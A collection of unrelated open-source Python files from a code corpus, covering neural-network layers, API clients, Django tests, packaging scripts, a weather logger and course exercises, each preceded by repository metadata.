"selu", "sigm", "squash", "swish", "tanh"]
def __init__(self, tensor_size: tuple, activation: str = "relu", **kwargs):
super(Activations, self).__init__()
if activation is not None:
activation = activation.lower()
self.t_size = tensor_size
self.activation = activation
self.function = None
if activation not in self.METHODS:
raise ValueError("activation: Invalid activation " +
"/".join(self.METHODS) +
": {}".format(activation))
self.function = getattr(self, "_" + activation)
if activation == "prelu":
self.weight = nn.Parameter(torch.ones(1) * 0.1)
if activation == "lklu":
self.negslope = kwargs["lklu_negslope"] if "lklu_negslope" in \
kwargs.keys() else 0.01
if activation == "elu":
self.alpha = kwargs["elu_alpha"] if "elu_alpha" in \
kwargs.keys() else 1.0
self.tensor_size = tensor_size
if activation in ("maxo", "rmxo"):
t_size = list(tensor_size)
t_size[1] = t_size[1] // 2
self.tensor_size = tuple(t_size)
def forward(self, tensor: torch.Tensor) -> torch.Tensor:
if self.function is None:
return tensor
return self.function(tensor)
def _relu(self, tensor: torch.Tensor):
return F.relu(tensor)
def _relu6(self, tensor: torch.Tensor):
return F.relu6(tensor)
def _lklu(self, tensor: torch.Tensor):
return F.leaky_relu(tensor, self.negslope)
def _elu(self, tensor: torch.Tensor):
return F.elu(tensor, self.alpha)
def _gelu(self, tensor: torch.Tensor):
return F.gelu(tensor)
def _prelu(self, tensor: torch.Tensor):
return F.prelu(tensor, self.weight)
def _selu(self, tensor: torch.Tensor):
return F.selu(tensor)
def _tanh(self, tensor: torch.Tensor):
return torch.tanh(tensor)
def _sigm(self, tensor: torch.Tensor):
return torch.sigmoid(tensor)
def _maxo(self, tensor: torch.Tensor):
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by 2"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
def _rmxo(self, tensor: torch.Tensor):
return self._maxo(F.relu(tensor))
def _swish(self, tensor: torch.Tensor):
return tensor * torch.sigmoid(tensor)
def _mish(self, tensor: torch.Tensor):
return tensor * F.softplus(tensor).tanh()
def _squash(self, tensor: torch.Tensor):
if not tensor.dim() == 3:
raise ValueError("Squash requires 3D tensors: {}".format(
tensor.dim()))
sum_squares = (tensor ** 2).sum(2, True)
return (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
def _hsigm(self, tensor: torch.Tensor):
return F.relu6(tensor + 3) / 6
def _hswish(self, tensor: torch.Tensor):
return self._hsigm(tensor) * tensor
def __repr__(self):
return self.activation
@staticmethod
def available() -> list:
return Activations.METHODS
def flops(self) -> int:
import numpy as np
flops = 0
numel = np.prod(self.t_size[1:])
if self.activation == "elu":
# max(0, x) + min(0, alpha*(exp(x)-1))
flops = numel * 5
elif self.activation in ("lklu", "prelu", "sigm"):
flops = numel * 3
elif self.activation == "maxo":
# torch.max(*x.split(x.size(1)//2, 1))
flops = numel / 2
elif self.activation == "mish":
# x * tanh(ln(1 + e^x))
flops = numel * 5
elif self.activation == "relu":
# max(0, x)
flops = numel
elif self.activation == "relu6":
# min(6, max(0, x))
flops = numel * 2
elif self.activation == "rmxo":
# maxo(relu(x))
flops = int(numel * 1.5)
elif self.activation == "squash":
# sum_squares = (tensor**2).sum(2, True)
# (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
flops = numel * 4 + self.t_size[1] * 2
elif self.activation == "swish":
# x * sigm(x)
flops = numel * 4
elif self.activation == "tanh":
# (exp(x) - exp(-x)) / (exp(x) + exp(-x))
flops = numel * 9
elif self.activation == "hsigm":
# min(6, max(0, x + 3)) / 6
flops = numel * 4
elif self.activation == "hswish":
# x * min(6, max(0, x + 3)) / 6
flops = numel * 8
return flops
| 2.890625
| 3
|
workflow/notebooks/dev/test_patterns.py
|
CambridgeSemiticsLab/BH_time_collocations
| 5
|
12777699
|
<filename>workflow/notebooks/dev/test_patterns.py<gh_stars>1-10
patterns = [
# PREP + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# PREP + ART + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word lex=H
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
"""
# PREP + ADJV
"""
ph:phrase
w1:word pdp=prep
<: w2:word pdp=advb
w1 =: ph
w2 := ph
""",
# NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# PREP+ NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# PREP + NOUN + C + NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
    # NOUN + C + NOUN + C + NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=subs st=c ls#card
<: word pdp=subs st=c ls#card
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# CARD + CARD + SUBS
"""
ph:phrase rela=NA
w1:word pdp=subs ls=card
<: word pdp=subs ls=card
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# CARD + W + CARD + SUBS
"""
ph:phrase rela=NA
w1:word pdp=subs ls=card
<: word lex=W
<: word pdp=subs ls=card
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# ~Cardinal quantifier phrases
"""
phrase rela=NA
/where/
word
/have/
pdp=subs prs=absent
/-/
word ls=card
word pdp=subs ls#card
""",
]
| 2.3125
| 2
|
src/lect06.py
|
luchenhua/MIT-OCW-600
| 0
|
12777700
|
__author__ = 'luchenhua'
EtoF = {'bread': 'du pain', 'wine': 'du vin', 'eats': 'mange', 'drinks': 'bois', 'likes': 'aime', 1: 'un',
'6.00': '6.00'}
print(EtoF)
print(EtoF.keys())
print(EtoF.keys)
del EtoF[1]
print(EtoF)
def translateWord(word, dictionary):
if word in dictionary:
return dictionary[word]
else:
return word
def translate(sentence):
translation = ''
word = ''
for e in sentence:
if e != ' ':
word = word + e
else:
translation = translation + ' ' + translateWord(word, EtoF)
word = ''
return translation[1:] + ' ' + translateWord(word, EtoF)
print(translate('John eats bread'))
print(translate('Steve drinks wine'))
print(translate('John likes 6.00'))
def simpleExp(b, n):
if n == 0:
return 1
else:
return b * simpleExp(b, n - 1)
print(simpleExp(2, 10))
def tower(n, f, t, s):
if n == 1:
print('Move from ' + f + ' to ' + t)
else:
tower(n - 1, f, s, t)
tower(1, f, t, s)
tower(n - 1, s, t, f)
print(tower(5, 'a', 'b', 'c'))
def toChars(s):
import string
    s = s.lower()
ans = ''
for c in s:
        if c in string.ascii_lowercase:
ans = ans + c
return ans
def isPal(s):
if len(s) <= 1:
return True
else:
return s[0] == s[-1] and isPal(s[1: -1])
def isPalindraw(s):
return isPal(toChars(s))
print(isPalindraw('Guttag'))
def isPalPrint(s, indent):
if len(s) <= 1:
print(indent + 'current: ' + s)
return True
else:
print(indent + 'current: ' + s)
return s[0] == s[-1] and isPalPrint(s[1: -1], (indent + ' '))
def isPalindrawPrint(s):
return isPalPrint(toChars(s), ' ')
print(isPalindrawPrint('Guttag'))
def fib(x):
assert type(x) == int and x >= 0
if x == 0 or x == 1:
return 1
else:
return fib(x - 1) + fib(x - 2)
print(fib(2))
print(fib(3))
print(fib(4))
print(fib(5))
| 3.875
| 4
|
WideResNet.py
|
Stick-To/Deep_Conv_Backone_tensorflow
| 12
|
12777701
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
class WideResNet:
def __init__(self, nk, input_shape, num_classes, weight_decay, keep_prob, data_format='channels_last'):
assert len(nk) == 2
assert (nk[0] - 1) % 3 == 0
self.N = (nk[0] - 1) // 3
self.k = nk[1]
self.input_shape = input_shape
self.num_classes = num_classes
self.weight_decay = weight_decay
self.prob = 1. - keep_prob
assert data_format in ['channels_first', 'channels_last']
self.data_format = data_format
self.global_step = tf.train.get_or_create_global_step()
self.is_training = True
self._define_inputs()
self._build_graph()
self._init_session()
def _define_inputs(self):
shape = [None]
shape.extend(self.input_shape)
self.images = tf.placeholder(dtype=tf.float32, shape=shape, name='images')
self.labels = tf.placeholder(dtype=tf.int32, shape=[None, self.num_classes], name='labels')
self.lr = tf.placeholder(dtype=tf.float32, shape=[], name='lr')
def _build_graph(self):
with tf.variable_scope('before_split'):
conv1 = self._conv_bn_activation(
bottom=self.images,
filters=16,
kernel_size=3,
strides=1,
)
with tf.variable_scope('split'):
residual_block = conv1
for i in range(self.N):
residual_block = self._residual_block(residual_block, 16*self.k, 1, 'group_conv2/conv'+str(i+1))
for i in range(self.N):
residual_block = self._residual_block(residual_block, 32*self.k, 2, 'group_conv3/conv'+str(i+1))
for i in range(self.N):
residual_block = self._residual_block(residual_block, 64*self.k, 2, 'group_conv4/conv'+str(i+1))
with tf.variable_scope('after_spliting'):
bn = self._bn(residual_block)
relu = tf.nn.relu(bn)
with tf.variable_scope('group_avg_pool'):
axes = [1, 2] if self.data_format == 'channels_last' else [2, 3]
global_pool = tf.reduce_mean(relu, axis=axes, keepdims=False, name='global_pool')
final_dense = tf.layers.dense(global_pool, self.num_classes, name='final_dense')
with tf.variable_scope('optimizer'):
self.logit = tf.nn.softmax(final_dense, name='logit')
self.classifer_loss = tf.losses.softmax_cross_entropy(self.labels, final_dense, label_smoothing=0.1, reduction=tf.losses.Reduction.MEAN)
self.l2_loss = self.weight_decay * tf.add_n(
[tf.nn.l2_loss(var) for var in tf.trainable_variables()]
)
total_loss = self.classifer_loss + self.l2_loss
lossavg = tf.train.ExponentialMovingAverage(0.9, name='loss_moveavg')
lossavg_op = lossavg.apply([total_loss])
with tf.control_dependencies([lossavg_op]):
self.total_loss = tf.identity(total_loss)
var_list = tf.trainable_variables()
varavg = tf.train.ExponentialMovingAverage(0.9, name='var_moveavg')
varavg_op = varavg.apply(var_list)
optimizer = tf.train.MomentumOptimizer(self.lr, momentum=0.9)
train_op = optimizer.minimize(self.total_loss, global_step=self.global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
self.train_op = tf.group([update_ops, lossavg_op, varavg_op, train_op])
self.accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(final_dense, 1), tf.argmax(self.labels, 1)), tf.float32), name='accuracy'
)
def _init_session(self):
self.sess = tf.InteractiveSession()
self.sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver()
self.best_saver = tf.train.Saver()
def train_one_batch(self, images, labels, lr, sess=None):
self.is_training = True
if sess is None:
sess_ = self.sess
else:
sess_ = sess
_, loss, acc = sess_.run([self.train_op, self.total_loss, self.accuracy],
feed_dict={
self.images: images,
self.labels: labels,
self.lr: lr
})
return loss, acc
def validate_one_batch(self, images, labels, sess=None):
self.is_training = False
if sess is None:
sess_ = self.sess
else:
sess_ = sess
logit, acc = sess_.run([self.logit, self.accuracy], feed_dict={
self.images: images,
self.labels: labels,
self.lr: 0.
})
return logit, acc
def test_one_batch(self, images, sess=None):
self.is_training = False
if sess is None:
sess_ = self.sess
else:
sess_ = sess
logit = sess_.run([self.logit], feed_dict={
self.images: images,
self.lr: 0.
})
return logit
def save_weight(self, mode, path, sess=None):
assert(mode in ['latest', 'best'])
if sess is None:
sess_ = self.sess
else:
sess_ = sess
saver = self.saver if mode == 'latest' else self.best_saver
saver.save(sess_, path, global_step=self.global_step)
print('save', mode, 'model in', path, 'successfully')
def load_weight(self, mode, path, sess=None):
assert(mode in ['latest', 'best'])
if sess is None:
sess_ = self.sess
else:
sess_ = sess
saver = self.saver if mode == 'latest' else self.best_saver
ckpt = tf.train.get_checkpoint_state(path)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess_, path)
print('load', mode, 'model in', path, 'successfully')
else:
raise FileNotFoundError('Not Found Model File!')
def _bn(self, bottom):
bn = tf.layers.batch_normalization(
inputs=bottom,
axis=3 if self.data_format == 'channels_last' else 1,
training=self.is_training
)
return bn
def _conv_bn_activation(self, bottom, filters, kernel_size, strides, activation=tf.nn.relu):
conv = tf.layers.conv2d(
inputs=bottom,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same',
data_format=self.data_format,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer()
)
bn = self._bn(conv)
if activation is not None:
return activation(bn)
else:
return bn
def _bn_activation_conv(self, bottom, filters, kernel_size, strides, activation=tf.nn.relu):
bn = self._bn(bottom)
if activation is not None:
bn = activation(bn)
conv = tf.layers.conv2d(
inputs=bn,
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding='same',
data_format=self.data_format,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer()
)
return conv
def _residual_block(self, bottom, filters, strides, scope):
with tf.variable_scope(scope):
with tf.variable_scope('conv_branch'):
conv = self._bn_activation_conv(bottom, filters, 3, strides)
dropout = self._dropout(conv, 'dropout')
conv = self._bn_activation_conv(dropout, filters, 3, 1)
with tf.variable_scope('identity_branch'):
if strides != 1:
shutcut = self._bn_activation_conv(bottom, filters, 1, strides)
else:
index = 3 if self.data_format == 'channels_last' else 1
                    if bottom.get_shape().as_list()[index] != filters:  # static shape check (tf.shape() yields a tensor)
shutcut = self._bn_activation_conv(bottom, filters, 1, strides)
else:
shutcut = bottom
return conv + shutcut
def _max_pooling(self, bottom, pool_size, strides, name):
return tf.layers.max_pooling2d(
inputs=bottom,
pool_size=pool_size,
strides=strides,
padding='same',
data_format=self.data_format,
name=name
)
def _avg_pooling(self, bottom, pool_size, strides, name):
return tf.layers.average_pooling2d(
inputs=bottom,
pool_size=pool_size,
strides=strides,
padding='same',
data_format=self.data_format,
name=name
)
def _dropout(self, bottom, name):
return tf.layers.dropout(
inputs=bottom,
rate=self.prob,
training=self.is_training,
name=name
)
| 2.34375
| 2
|
setup.py
|
ops-utils/fresh-slack
| 1
|
12777702
|
# Not currently used; in case I ever turn this into a formal package
import setuptools
with open('README.md', 'r') as f:
long_description = f.read()
with open('requirements.txt') as f:
install_requires = f.read().split('\n')
install_requires = [x for x in install_requires if x != '']
setuptools.setup(
name = 'fresh-slack',
version = '0.1.0',
author = ['<NAME>'],
author_email = ['<EMAIL>'],
description = 'Like destalinator, but active',
long_description = long_description,
url = 'https://github.com/anyutils/fresh-slack',
packages = setuptools.find_packages(),
python_requires = '>= 3.6.*',
install_requires = install_requires,
extras_require = {
'dev': [
'pytest >= 5.4.3',
'pytest-cov >= 2.10.0',
'coverage >= 5.2',
'mypy >= 0.782'
]
},
classifiers = [
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
'License :: MIT'
],
entry_points = {
'console_scripts': [
'freshen-slack = fresh_slack.main:main'
]
},
include_package_data = True
)
| 1.484375
| 1
|
kkbox_developer_sdk/feature_playlist_fetcher.py
|
garyckhsu/django-REST
| 71
|
12777703
|
#!/usr/bin/env python
# encoding: utf-8
from .fetcher import *
from .territory import *
class KKBOXFeaturePlaylistFetcher(Fetcher):
'''
List all featured playlists metadata.
See `https://docs-en.kkbox.codes/v1.1/reference#featured-playlists`.
'''
@assert_access_token
def fetch_all_feature_playlists(self, terr=KKBOXTerritory.TAIWAN):
'''
Fetches featured playlists.
:param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists'
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
@assert_access_token
def fetch_feature_playlist(self, playlist_id, terr=KKBOXTerritory.TAIWAN):
'''
        Fetches a single featured playlist by its ID.
        :param playlist_id: the ID of the featured playlist.
        :param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists-playlist_id`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists/%s' % playlist_id
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
@assert_access_token
def fetch_feature_playlist_tracks(self, playlist_id, terr=KKBOXTerritory.TAIWAN):
'''
        Fetches the tracks of a featured playlist.
        :param playlist_id: the ID of the featured playlist.
        :param terr: the current territory.
:return: API response.
:rtype: dict
See `https://docs-en.kkbox.codes/v1.1/reference#featuredplaylists-playlist_id-tracks`.
'''
url = 'https://api.kkbox.com/v1.1/featured-playlists/%s/tracks' % playlist_id
url += '?' + url_parse.urlencode({'territory': terr})
return self.http._post_data(url, None, self.http._headers_with_access_token())
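# Hedged usage sketch (not part of the original file): how the fetchers above are typically
# driven. Obtaining `access_token`, the single-argument constructor, and the response layout
# (a 'data' list of playlist dicts with an 'id' key) are assumptions, not taken from this file.
def _example_fetch_first_playlist_tracks(access_token):
    fetcher = KKBOXFeaturePlaylistFetcher(access_token)
    playlists = fetcher.fetch_all_feature_playlists(terr=KKBOXTerritory.TAIWAN)
    first_id = playlists['data'][0]['id']  # assumed response shape
    return fetcher.fetch_feature_playlist_tracks(first_id)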
| 2.4375
| 2
|
Python_Basics/Programming_in_Python/operators_and_operands.py
|
samyumobi/A-Complete-Python-Guide-For-Beginners
| 7
|
12777704
|
<reponame>samyumobi/A-Complete-Python-Guide-For-Beginners<filename>Python_Basics/Programming_in_Python/operators_and_operands.py<gh_stars>1-10
print(100 + 200) # addition
print(5 - 2) # subtraction
print(3 * 10) # multiplication
print(10 / 3) # division
print(10 // 3) # integer division
print(10 % 3) # modulo
print(4**2) # exponentiation
print(10 + 20 / 2)
print((10 + 20) / 2)
| 3.78125
| 4
|
Gal2Renpy/DefineSyntax/MovieDefine.py
|
dtysky/Gal2Renpy
| 36
|
12777705
|
#coding:utf-8
#################################
#Copyright(c) 2014 dtysky
#################################
import G2R,os
class MovieDefine(G2R.DefineSyntax):
def Creat(self,Flag,US,FS,DictHash):
DictHash=G2R.DefineSyntax.Creat(self,Flag,US,FS,DictHash)
if DictHash[Flag]==G2R.DHash(US.Args[Flag]):
return DictHash
path=US.Args['pathmode']['ScriptPath']+'define/movie.rpy'
elepath=US.Args['pathmode']['MoviePath']
Args=US.Args[Flag]
so=''
for ele in Args:
if Args[ele]=='StopMoive':
continue
so+='define movie_'+os.path.splitext(Args[ele])[0]+' = '
so+="'"+elepath+Args[ele]+"'\n"
FS.Open(path,'w')
FS.Write(so)
FS.Close()
return DictHash
| 2.46875
| 2
|
Mod 01/04-2-List.py
|
SauloCav/CN
| 0
|
12777706
|
<filename>Mod 01/04-2-List.py<gh_stars>0
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
def f(x):
return x**3 -x -1
def phi(x):
return (x+1)**(1/3)
x = 1.5
while f(x+10**-4)*f(x-10**-4)>= 0:
x = phi(x)
print(x)
| 3.5
| 4
|
setup.py
|
TheDataShed/geograpy3
| 0
|
12777707
|
from setuptools import setup
import os
from collections import OrderedDict
try:
long_description = ""
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
except:
print('Curr dir:', os.getcwd())
long_description = open('../../README.md').read()
setup(name='geograpy3',
version='0.1.24',
description='Extract countries, regions and cities from a URL or text',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/somnathrakshit/geograpy3',
download_url='https://github.com/somnathrakshit/geograpy3',
author='<NAME>',
author_email='<EMAIL>',
license='Apache',
project_urls=OrderedDict(
(
("Documentation", "https://geograpy3.netlify.app"),
("Code", "https://github.com/somnathrakshit/geograpy3"),
("Issue tracker", "https://github.com/somnathrakshit/geograpy3/issues"),
)
),
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
packages=['geograpy'],
install_requires=[
'numpy',
'nltk',
'newspaper3k',
'jellyfish',
'pycountry',
'pylodstorage'
],
scripts=['geograpy/bin/geograpy-nltk'],
package_data={
'geograpy': ['data/*.csv'],
},
zip_safe=False)
| 1.75
| 2
|
starlite/logging.py
|
madlad33/starlite
| 0
|
12777708
|
from logging import config
from typing import Any, Dict, List, Optional, Union
from pydantic import BaseModel
from typing_extensions import Literal
class LoggingConfig(BaseModel):
version: Literal[1] = 1
incremental: bool = False
disable_existing_loggers: bool = False
filters: Optional[Dict[str, Dict[str, Any]]] = None
formatters: Dict[str, Dict[str, Any]] = {
"standard": {"format": "%(levelname)s - %(asctime)s - %(name)s - %(module)s - %(message)s"}
}
handlers: Dict[str, Dict[str, Any]] = {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"queue_listener": {"class": "starlite.QueueListenerHandler", "handlers": ["cfg://handlers.console"]},
}
loggers: Dict[str, Dict[str, Any]] = {
"starlite": {
"level": "INFO",
"handlers": ["queue_listener"],
},
}
root: Dict[str, Union[Dict[str, Any], List[Any], str]] = {"handlers": ["console"], "level": "WARNING"}
def configure(self) -> None:
"""Configure logging by converting 'self' to dict and passing it to logging.config.dictConfig"""
config.dictConfig(self.dict(exclude_none=True))
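# Minimal usage sketch (not part of the original file): apply the default configuration and
# then log through the standard library as usual. The handler classes referenced above must
# be importable, which they are when this module is used from within the starlite package.
if __name__ == "__main__":
    import logging
    LoggingConfig().configure()
    logging.getLogger("starlite").info("logging configured via LoggingConfig.configure()")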
| 2.25
| 2
|
app/user/tests/test_user_api.py
|
ClickTravel-VincentCleaver/recipe-app-api
| 0
|
12777709
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
"""Test the users API (public)"""
# ------------------------------------------------------
# CREATE USER tests
# ------------------------------------------------------
def setUp(self):
self.client = APIClient()
def test_create_user_success(self):
"""Test that create user with valid payload is successful"""
# Given
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a success response status is returned
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
# Then the password is stored for the user
user = get_user_model().objects.get(**response.data)
self.assertTrue(user.check_password(payload['password']))
# Then the password is not returned in the response
self.assertNotIn('password', response.data)
def test_create_duplicate_user_fails(self):
"""Test creating a user that already exists fails"""
# Given a user that already exists
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
create_user(**payload)
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a bad request status is returned
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_user_with_password_too_short(self):
"""Test creating a user with a password
that is not more than 5 characters"""
# Given a create user request with a too-short password
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'MOCK_NAME'
}
# When
response = self.client.post(CREATE_USER_URL, payload)
# Then a bad request status is returned
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the user is not created
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
# ------------------------------------------------------
# TOKEN tests
# ------------------------------------------------------
def test_create_token_for_user(self):
"""Test that a token is created for the user"""
# Given
payload = {'email': '<EMAIL>', 'password': '<PASSWORD>'}
create_user(**payload)
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then the response contains a token
self.assertIn('token', response.data)
def test_create_token_invalid_credentials(self):
"""Test that token is not created for invalid credentials"""
# Given
create_user(email='<EMAIL>', password='<PASSWORD>')
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
def test_create_token_no_user(self):
"""Test that token is not created for non-existent user"""
# Given
payload = {'email': '<EMAIL>', 'password': '<PASSWORD>'}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
def test_create_token_missing_password(self):
"""Test that email and password are required"""
# Given
create_user(email='<EMAIL>', password='<PASSWORD>')
payload = {'email': '<EMAIL>', 'password': ''}
# When
response = self.client.post(TOKEN_URL, payload)
# Then the response fails
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Then the response does not contain a token
self.assertNotIn('token', response.data)
# ------------------------------------------------------
# ME tests
# ------------------------------------------------------
def test_get_me_unauthorised(self):
"""Test that authentication is required for users"""
# Given no authentication token
# When
response = self.client.get(ME_URL)
# Then
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
"""Test API requests that require authentication"""
def setUp(self):
self.user = create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='MOCK_NAME'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_get_me_success(self):
"""Test get me for authenticated user"""
response = self.client.get(ME_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data,
{
'name': self.user.name,
'email': self.user.email
},
)
def test_post_me_not_allowed(self):
"""Test that POST is not allowed on me URL"""
# Given / When
response = self.client.post(ME_URL, {})
# Then
self.assertEqual(
response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_me_success(self):
"""Test updating the user profile for authenticated user"""
# Given
payload = {
'name': 'MOCK_NEW_NAME',
'password': '<PASSWORD>',
}
# When
response = self.client.patch(ME_URL, payload)
# Then request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then user is updated
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
| 2.84375
| 3
|
daily.py
|
filiptronicek/czech-weather
| 1
|
12777710
|
from pyowm import OWM
import csv
from datetime import datetime
from os import environ, stat, path, access, R_OK, mkdir
API_key = environ.get('API_key')
if API_key is None:
from creds import API_key
fields = ["date", "windspeed", "humidity", "temperature", "status"]
now = datetime.now()
cities = ["Praha", "Plzen", "<NAME>", "<NAME>", "Usti nad Labem", "Liberec", "<NAME>", "Pardubice", "Jihlava", "Brno", "Olomouc", "Zlin", "Ostrava"]
for city in cities:
foldername = "data/"
filename = foldername + city.lower()+".csv"
if not path.isdir(foldername):
mkdir(foldername)
    if not path.isfile(filename) and not access(filename, R_OK):
        open(filename, "w").close()  # create an empty file so the header can be appended below
if stat(filename).st_size == 0:
WriteData = open(filename, "a")
WriteData.write("time, windspeed, humidity, temperature, pressure, rain, snow, clouds, status \n")
WriteData.close()
def getWeatherInfo(city: str):
owm = OWM(API_key)
mgr = owm.weather_manager()
obs = mgr.weather_at_place(city+',CZ')
w = obs.weather
# Weather details
wind = w.wind()
humidity = w.humidity
temp = w.temperature('celsius')
status = w.status.lower()
pressure = w.pressure
rain = w.rain
snow = w.snow
clouds = w.clouds
def checkFor(objct):
if len(objct) == 0:
return 0
else:
return objct
return [now.strftime("%Y.%m.%d"), wind['speed'], humidity, temp['temp'], pressure['press'], checkFor(rain), checkFor(snow), clouds, status]
def createString(csvArr):
fnlStr = ""
for i,el in enumerate(csvArr):
fnlStr += str(el)
if i != len(csvArr) - 1:
fnlStr += ","
else:
fnlStr += "\n"
return fnlStr
for city in cities:
filename = "data/"+city.lower()+".csv"
csvArrIn = getWeatherInfo(city)
WriteData = open(filename, "a")
WriteData.write(createString(csvArrIn))
WriteData.close()
| 2.78125
| 3
|
engine/admin.py
|
lordoftheflies/gargantula-scrapersite
| 0
|
12777711
|
<reponame>lordoftheflies/gargantula-scrapersite<filename>engine/admin.py
from django.contrib import admin
from django.contrib.admin import ModelAdmin
from django.utils.translation import gettext as _
from . import models
# Register your models here.
class ArgumentInline(admin.TabularInline):
model = models.ArgumentModel
verbose_name_plural = _('Parameters')
fk_name = 'process'
fields = ['slug', 'friendly_name', 'description', 'data_type', 'default_value', 'tag']
extra = 0
class PropertyInline(admin.TabularInline):
model = models.ArgumentModel
verbose_name_plural = _('Properties')
fk_name = 'process'
fields = ['slug', 'friendly_name', 'description', 'data_type', 'default_value', 'tag']
extra = 0
@admin.register(models.ProcessModel)
class ProcessAdmin(ModelAdmin):
fields = ['friendly_name', 'description', 'notebook']
list_display = ['id', 'friendly_name', 'notebook_basename', 'description']
icon = '<i class="material-icons">attachment</i>'
inlines = [
ArgumentInline,
PropertyInline
]
| 1.992188
| 2
|
models/GenericModel.py
|
marioviti/nn_segmentation
| 0
|
12777712
|
from serialize import save_to, load_from
from keras.models import Model
class GenericModel(object):
def __init__( self, inputs, outputs, loss, metrics, optimizer, loss_weights=None, sample_weight_mode=None):
"""
params:
inputs: (tuple)
outputs: (tuple)
loss: (function) Optimization strategy.
metrics: (tuple)
optimizer: (optimizer)
"""
self.model = Model(inputs=inputs, outputs=outputs)
self.inputs_shape = [ input._keras_shape[1:] for input in inputs ]
self.outputs_shape = [ output._keras_shape[1:] for output in outputs ]
self.loss= loss
self.metrics = metrics
self.optimizer = optimizer
self.loss_weights = loss_weights
self.sample_weight_mode = sample_weight_mode
self.compile()
def compile(self):
if not self.sample_weight_mode is None:
self.model.compile( optimizer=self.optimizer,
sample_weight_mode=self.sample_weight_mode,
loss=self.loss, metrics=self.metrics )
elif not self.loss_weights is None:
self.model.compile( optimizer=self.optimizer,
loss_weights=self.loss_weights,
loss=self.loss, metrics=self.metrics )
else:
self.model.compile( optimizer=self.optimizer,
loss=self.loss, metrics=self.metrics )
def save_model(self, name=None):
self.name = self.name if name is None else name
save_to( self.model,self.name )
def load_model(self, name=None):
self.name = self.name if name is None else name
self.model = load_from( self.name )
self.compile()
